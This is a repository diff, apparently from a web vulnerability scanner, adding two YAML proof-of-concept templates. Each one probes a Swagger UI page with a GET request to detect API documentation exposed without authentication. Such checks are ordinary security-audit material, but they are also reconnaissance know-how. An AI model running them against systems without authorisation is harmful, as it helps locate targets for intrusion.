author: shadown1ng(https://github.com/shadown1ng)

10
WebScan/pocs/swagger-ui-unauth-No1.yml Normal file
View File

@@ -0,0 +1,10 @@
name: poc-yaml-swagger-ui-unauth1
rules:
- method: GET
path: /swagger-ui.html
expression: |
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
detail:
author: AgeloVito
links:
- https://blog.csdn.net/u012206617/article/details/109107210

10
WebScan/pocs/swagger-ui-unauth-No2.yml Normal file
View File

@@ -0,0 +1,10 @@
name: poc-yaml-swagger-ui-unauth2
rules:
- method: GET
path: /api/swagger-ui.html
expression: |
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
detail:
author: AgeloVito
links:
- https://blog.csdn.net/u012206617/article/details/109107210

Some files were not shown because too many files have changed in this diff Show More